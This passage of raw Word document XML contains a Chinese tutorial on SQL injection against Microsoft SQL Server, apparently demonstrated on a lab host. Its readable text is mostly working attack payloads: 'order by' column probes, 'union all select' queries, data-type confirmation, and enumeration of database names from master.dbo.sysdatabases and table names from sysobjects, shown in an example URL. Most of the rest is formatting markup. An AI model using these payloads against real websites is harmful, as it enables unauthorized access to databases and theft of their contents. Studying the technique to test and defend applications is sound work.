        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5037F86F" wp14:editId="0E428DDF">
            <wp:extent cx="5274310" cy="1839713"/>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1839713"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D40F992" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00764DAB" w:rsidRDefault="00933D73"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得到第一个字段值后，再提交如下语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B32A1C" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00764DAB" w:rsidRDefault="001C16F0"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0051186C" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and (select top 1 字段名 from 表名 where 字段名&lt;&gt;字段值1)&gt;0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6463465E" w14:textId="77777777" w:rsidR="001C16F0" w:rsidRPr="001A202D" w:rsidRDefault="00FC5BA1" w:rsidP="001A202D">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即可爆出其他字段值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8F67F4" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00AC7BA8" w:rsidRDefault="003D5726"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2.9</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00212FE0" w:rsidRPr="00AC7BA8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>union select查询注入技术</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B93D362" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00764DAB" w:rsidRDefault="00565DB1"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MsSQL注入的union select查询与Access数据库注入类似，但在具体的查询语句有所不同。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012124FB" w14:textId="77777777" w:rsidR="00A77028" w:rsidRPr="00276D91" w:rsidRDefault="00A77028"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 null替换查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F946482" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00764DAB" w:rsidRDefault="00A77028"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首先，用order by检测出字段数目，然后进行以下union select查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE0B954" w14:textId="77777777" w:rsidR="004C0798" w:rsidRPr="00764DAB" w:rsidRDefault="004C0798"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order by 1 //正常页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A329254" w14:textId="77777777" w:rsidR="004C0798" w:rsidRPr="00764DAB" w:rsidRDefault="004C0798"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order by 3  //正常页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51244694" w14:textId="77777777" w:rsidR="004C0798" w:rsidRPr="00764DAB" w:rsidRDefault="004C0798"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w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> order by 4  //报错页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B48017" w14:textId="77777777" w:rsidR="006769EE" w:rsidRDefault="00596382" w:rsidP="001A202D">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A496BCB" wp14:editId="5DB92508">
            <wp:extent cx="5274310" cy="3069704"/>
            <wp:effectExtent l="19050" t="0" r="254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74310" cy="3069704"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A2FADF" w14:textId="77777777" w:rsidR="006769EE" w:rsidRPr="00764DAB" w:rsidRDefault="006769E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通过上图可以知道当前数据库有3个字段。接着利用union联合查询把这3个数字替换为null确认，语法如下:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217F3B6B" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRDefault="004A2678" w:rsidP="00644363">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and 1=2 union all select null,null,null,null,......from 当前表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29173BC2" w14:textId="77777777" w:rsidR="00596382" w:rsidRPr="00764DAB" w:rsidRDefault="00596382"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nd</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1=1</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union</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all</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select</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> null</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null</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 xml:space="preserve">null </w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidR="00C6629E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sysobjects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5C4AAE" w14:textId="77777777" w:rsidR="00596382" w:rsidRPr="00596382" w:rsidRDefault="00596382" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22CE9F64" wp14:editId="6BC57FFD">
            <wp:extent cx="5274310" cy="1157262"/>
            <wp:effectExtent l="19050" t="0" r="254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274310" cy="1157262"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA9E0CF" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00764DAB" w:rsidRDefault="00BA1616"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上面的语句中，字段数目为几就加几个null进行联合查询。由于null可代表字符或数字类型.因此不会出现数据类型转换出错提示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762238BE" w14:textId="77777777" w:rsidR="00474B6B" w:rsidRPr="00276D91" w:rsidRDefault="00474B6B"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2.确认数据类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E7BF2C" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00764DAB" w:rsidRDefault="00474B6B"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如果页面返回正常，则将</w:t>
      </w:r>
      <w:r w:rsidR="00596382" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ull逐个用数字替换，提交以下语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9DAF0F" w14:textId="77777777" w:rsidR="001D7C4E" w:rsidRPr="00644363" w:rsidRDefault="001D7C4E"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 1=2 union all select 1,null,null,null,......from 当前表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E51B581" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00644363" w:rsidRDefault="001D7C4E"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 1=2 union all select 1,2,null,null,......from 当前表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FACF4A5" w14:textId="77777777" w:rsidR="006769EE" w:rsidRPr="00764DAB" w:rsidRDefault="006769EE"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例如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://192.168.1.55/sqlserver/1.aspx?xxser=1and1=1unionallselect</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</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2</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 xml:space="preserve">null </w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fromsysobjects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09325588" w14:textId="77777777" w:rsidR="006769EE" w:rsidRPr="006769EE" w:rsidRDefault="00875315" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12CC03C0" wp14:editId="37B89386">
            <wp:extent cx="5274310" cy="2014591"/>
            <wp:effectExtent l="19050" t="0" r="254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274310" cy="2014591"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B07F1FC" w14:textId="77777777" w:rsidR="00645B64" w:rsidRPr="00764DAB" w:rsidRDefault="001A29B3" w:rsidP="001A202D">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替换的过程中，返回页面提示数据类型出错，则说明该位置处的数据类型为文字text，将相应的数字处修改为任意字符，如'text'，并继续进行替换。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADB3780" w14:textId="77777777" w:rsidR="00645B64" w:rsidRPr="00764DAB" w:rsidRDefault="00645B64"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and1=1unionallselect</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</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text'</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 xml:space="preserve">null </w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fromsysobjects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ECF328" w14:textId="77777777" w:rsidR="00875315" w:rsidRDefault="00875315" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F004D0D" wp14:editId="0998CF9B">
            <wp:extent cx="5274310" cy="1371041"/>
            <wp:effectExtent l="19050" t="0" r="254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274310" cy="1371041"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B390E36" w14:textId="77777777" w:rsidR="00875315" w:rsidRPr="00764DAB" w:rsidRDefault="00645B64"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再进行提交链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E30ECD" w14:textId="77777777" w:rsidR="00645B64" w:rsidRPr="00764DAB" w:rsidRDefault="00645B64"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and1=1unionallselect</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</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text'</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 xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fromsysobjects</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  //页面正常，说明只有字段2位置处查询数据类型号为text。如图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBB9881" w14:textId="77777777" w:rsidR="00645B64" w:rsidRPr="00276D91" w:rsidRDefault="005559E2" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="466125A8" wp14:editId="17EE684A">
            <wp:extent cx="5274310" cy="117593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5274310" cy="1175935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD65205" w14:textId="77777777" w:rsidR="00645B64" w:rsidRPr="00645B64" w:rsidRDefault="00645B64" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B157CC3" w14:textId="77777777" w:rsidR="005C30DC" w:rsidRPr="00276D91" w:rsidRDefault="005C30DC"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lastRenderedPageBreak/>
        <w:t>3.查询所有数据库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525FEA87" w14:textId="77777777" w:rsidR="003C06FA" w:rsidRPr="00764DAB" w:rsidRDefault="003C06F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现在我们将text内容</w:t>
      </w:r>
      <w:r w:rsidR="005C30DC" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>替换</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成要查询的数据库内容，先来查询数据库名，代码如下:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B524E5" w14:textId="77777777" w:rsidR="00EA2737" w:rsidRPr="00764DAB" w:rsidRDefault="00C11E8B"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select name from master.dbo.sysdatabases where dbid=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74553596" w14:textId="77777777" w:rsidR="00EA2737" w:rsidRPr="00764DAB" w:rsidRDefault="00EA2737"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and1=</w:t>
      </w:r>
      <w:r w:rsidR="00626F35" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>unionallselect</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00E50A50" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00E50A50" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>select name from master.dbo.sysdatabases where dbid=1</w:t>
      </w:r>
      <w:r w:rsidR="00E50A50" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</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 xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fromsysobjects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F5B7E1" w14:textId="77777777" w:rsidR="00471ACE" w:rsidRPr="00764DAB" w:rsidRDefault="00471AC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增加上面查询语句中的bdid的值，就可以获取数据库列表中的所有数据库名。</w:t>
      </w:r>
      <w:r w:rsidR="00104F19" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>但在我的mssql2005数据库中好像IE没有回显，但执行已成功，就是不显示出来，这应是我的测试代码有些小问题或是MSsql2005</w:t>
      </w:r>
      <w:r w:rsidR="002941D7" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前版本</w:t>
      </w:r>
      <w:r w:rsidR="00602721" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>缺少一些组件</w:t>
      </w:r>
      <w:r w:rsidR="00104F19" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002045A7" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下面以数据库里面演示为例,</w:t>
      </w:r>
      <w:r w:rsidR="00104F19" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如图:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049BD3EF" w14:textId="77777777" w:rsidR="00104F19" w:rsidRPr="00276D91" w:rsidRDefault="00104F19" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30239296" wp14:editId="5FBB44B4">
            <wp:extent cx="5274310" cy="4211993"/>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274310" cy="4211993"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="691E3D35" w14:textId="77777777" w:rsidR="00471ACE" w:rsidRPr="00276D91" w:rsidRDefault="00471ACE"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4.查询数据库中的所有表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481EFBBC" w14:textId="77777777" w:rsidR="00CB35DE" w:rsidRPr="00764DAB" w:rsidRDefault="00471AC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将数字或字符处替换成如下代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AC4132" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00644363" w:rsidRDefault="00DF2CC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select top 1 name from (select top n name from sysobjects where xtype=0x75 order by name) t order by name desc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564E1C90" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00764DAB" w:rsidRDefault="00D03658"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或者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAAB4C1" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00644363" w:rsidRDefault="008A76F8"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select top 1 name from sysobjects where xtype=0x75 and name not in(select top n name from sysobjects where xtype=0x75))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E50DED" w14:textId="77777777" w:rsidR="00CB35DE" w:rsidRPr="00764DAB" w:rsidRDefault="00CB35D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and1=</w:t>
      </w:r>
      <w:r w:rsidR="00626F35" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>unionallselect</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
